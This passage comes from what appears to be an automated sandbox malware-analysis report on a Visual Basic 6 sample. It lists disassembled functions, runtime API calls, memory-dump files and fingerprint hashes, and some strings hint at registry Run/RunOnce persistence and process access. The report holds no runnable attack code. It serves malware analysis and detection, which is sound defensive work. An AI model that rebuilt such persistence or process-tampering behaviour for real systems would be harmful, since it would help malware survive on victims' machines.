                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040930E
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405A00,0000005C), ref: 00409354
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0040ABAC
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040ABDE
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AC25
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$Error$System$List$Ansi$Copy$Chkstk$#525#580#600#616BoundsBstrCheckConstruct2DestructGenerateHresultOverflowUnicode
                                                                                                                                                            • String ID: D
                                                                                                                                                            • API String ID: 2939130588-2746444292
                                                                                                                                                            • Opcode ID: d5f1b171752d2ebd0cb73852c0216f0e9dff9fe28f343d3b4a74cd50a325f7d3
                                                                                                                                                            • Instruction ID: 28a137cb3eb25e758eafbfe2ee42426fba9f6ce594aea99c4a1f109bb6dd76d7
                                                                                                                                                            • Opcode Fuzzy Hash: d5f1b171752d2ebd0cb73852c0216f0e9dff9fe28f343d3b4a74cd50a325f7d3
                                                                                                                                                            • Instruction Fuzzy Hash: 7CE1B876900104EFD705EBE0EE989DF7BB9EB4C301B10812AF617A7264DF745A45CBA8
                                                                                                                                                            Function 004111A0 Relevance: 103.8, APIs: 69, Instructions: 297COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(00000000,00000000), ref: 004111FE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00411206
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 0041120A
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00411222
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00411231
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 00411243
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000020,000000FF,00000000), ref: 0041124A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411252
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00411255
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411262
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411287
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 0041128E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00411299
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004112A1
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 004112A5
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004112AD
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004112B6
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004112EF
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 004112F2
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041130F
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411471
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 0041147A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041147E
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00411487
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00411495
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004112DE
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004112C4
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411323
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00411326
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411339
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 0041133D
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00411355
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00411364
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 00411370
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041137A
                                                                                                                                                            • #525.MSVBVM60(00001000), ref: 00411385
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00411390
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411398
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 0041139B
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004113D2
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004113DB
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004113E3
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004113EC
                                                                                                                                                            • #598.MSVBVM60 ref: 00411404
                                                                                                                                                            • #525.MSVBVM60(-00000001), ref: 00411424
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041142F
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411437
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00411440
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411448
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00411451
                                                                                                                                                            • #598.MSVBVM60 ref: 0041145E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004114A9
                                                                                                                                                              • Part of subcall function 0040EAB0: #594.MSVBVM60(?,72A21A08,-00000001,72A26C30), ref: 0040EB1A
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                              • Part of subcall function 0040EAB0: #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                              • Part of subcall function 0040EAB0: #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004114BD
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004114C5
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004114CE
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004114E2
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004114ED
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 004114F0
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 004114F9
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041150F
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00411518
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041151D
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00411520
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00411529
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00411572), ref: 00411560
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00411565
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041156A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041156F
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00411589
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$File$Copy$#516#631BstrClosePut3$#525#570Get3$#598#648ErrorExitListOpenProcSeek$#537#594Overflow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 936154001-0
                                                                                                                                                            • Opcode ID: 7388e1bd2b66fa6b056741b4791ef962c4142c5a93219274217dbce0ffb5ad99
                                                                                                                                                            • Instruction ID: ff6c34d3fed2378173252cfce728cf62963b49a80d3fcd64e048a008bc34630c
                                                                                                                                                            • Opcode Fuzzy Hash: 7388e1bd2b66fa6b056741b4791ef962c4142c5a93219274217dbce0ffb5ad99
                                                                                                                                                            • Instruction Fuzzy Hash: F6B12D71D00218AFDB04DFE4DE88AEE7BB9FB88311F10452AE616E72A0DB745945CF58
                                                                                                                                                            Function 0040480F Relevance: 89.6, APIs: 47, Strings: 4, Instructions: 334COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0040BF4E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 0040BF95
                                                                                                                                                              • Part of subcall function 00418B50: __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                              • Part of subcall function 00418B50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                            • __vbaStrCat.MSVBVM60( RO,?,80000002,?,Start,00000004,80000002,?,Start,00000002,80000001,?,?,00000000), ref: 0040C00B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040C016
                                                                                                                                                            • __vbaStrCat.MSVBVM60(Once,?,?,00000000,?,?,?,00000000,004025E6), ref: 0040C030
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040C03B
                                                                                                                                                              • Part of subcall function 00418C90: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
                                                                                                                                                              • Part of subcall function 00418C90: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
                                                                                                                                                              • Part of subcall function 00418C90: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,00000000,004025E6), ref: 0040C056
                                                                                                                                                            • __vbaStrCat.MSVBVM60( RO,?,?,00000000,004025E6), ref: 0040C072
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 0040C07D
                                                                                                                                                            • __vbaStrCat.MSVBVM60(Once,?,?,00000000,?,00000000,004025E6), ref: 0040C096
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 0040C0A1
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,00000000,004025E6), ref: 0040C0BC
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,0040563C), ref: 0040C0D3
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C0DE
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040C111
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C12C
                                                                                                                                                            • __vbaNew.MSVBVM60(0040564C), ref: 0040C13E
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C149
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040C17C
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C197
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040C1C2
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000000,00000001), ref: 0040C1D6
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040C1EB
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000001,00000000), ref: 0040C1F4
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040C214
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040C238
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?), ref: 0040C252
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040C259
                                                                                                                                                            • #529.MSVBVM60(00000008), ref: 0040C26D
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C27D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Error$CopyMove$System$AnsiListUnicode$Chkstk$CheckHresult$#529BstrCast
                                                                                                                                                            • String ID: RO$C$Once$Start
                                                                                                                                                            • API String ID: 3306888832-2962527757
                                                                                                                                                            • Opcode ID: 38f2c482234380c5ccf5e47192bcb562df34f22c8bdb2e96fe65b30f76930fc4
                                                                                                                                                            • Instruction ID: 2a7bed8e637f556c1a294a0d9af7fafa12270aafcab1a65859bb43c9b5deaf43
                                                                                                                                                            • Opcode Fuzzy Hash: 38f2c482234380c5ccf5e47192bcb562df34f22c8bdb2e96fe65b30f76930fc4
                                                                                                                                                            • Instruction Fuzzy Hash: 24D1DC75900208EFDB04DFE4DD89BDE7BB9FB48305F108529F606B61A0DB745A45CBA8
                                                                                                                                                            Function 0040AE40 Relevance: 80.8, APIs: 43, Strings: 3, Instructions: 347COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040AE5E
                                                                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,?,004025E6), ref: 0040AEA7
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AEB6
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,004025E6), ref: 0040AECE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,004025E6), ref: 0040AEF4
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 0040AF1D
                                                                                                                                                              • Part of subcall function 00418B50: __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                              • Part of subcall function 00418B50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,?,004025E6), ref: 0040AF5A
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 0040AF94
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0040AFAA
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 0040AFC3
                                                                                                                                                            • #525.MSVBVM60(00000104), ref: 0040AFEC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040AFF7
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0040B02E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040B06D
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 0040B088
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 0040B0AE
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0040B0BF
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0040B0D4
                                                                                                                                                            • #616.MSVBVM60(?,?), ref: 0040B0E9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040B0F7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 0040B111
                                                                                                                                                            • #517.MSVBVM60(00000000), ref: 0040B118
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040B123
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040B139
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?,?,004025E6), ref: 0040B14D
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(?,?,?,?,004025E6), ref: 0040B17F
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(?,?,?,?,004025E6), ref: 0040B1BD
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,?,?,?,004025E6), ref: 0040B204
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,004025E6), ref: 0040B21A
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,?,?,?,?,004025E6), ref: 0040B233
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 0040B257
                                                                                                                                                            • #580.MSVBVM60(?,00000027,?,?,0041B088,?), ref: 0040B2DB
                                                                                                                                                            • __vbaStrCat.MSVBVM60( SE,?,?), ref: 0040B2F3
                                                                                                                                                            • #600.MSVBVM60(00000008,00000000), ref: 0040B312
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 0040B324
                                                                                                                                                            • #580.MSVBVM60(?,00000027,?,?,0041B088,?), ref: 0040B399
                                                                                                                                                            • __vbaStrCat.MSVBVM60( PR,?,?), ref: 0040B3B2
                                                                                                                                                            • #600.MSVBVM60(00000008,00000000), ref: 0040B3D1
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 0040B3E3
                                                                                                                                                              • Part of subcall function 00410560: __vbaChkstk.MSVBVM60(?,004025E6,?,?,?,?,?,?,?,?,004025E6), ref: 0041057E
                                                                                                                                                              • Part of subcall function 00410560: __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 004105AE
                                                                                                                                                              • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(001F03FF,00000000,?,?,?,?,?,004025E6), ref: 004105E8
                                                                                                                                                              • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(00000000), ref: 00410611
                                                                                                                                                              • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(00000000), ref: 00410627
                                                                                                                                                            • #598.MSVBVM60 ref: 0040B3F0
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040B456), ref: 0040B42E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
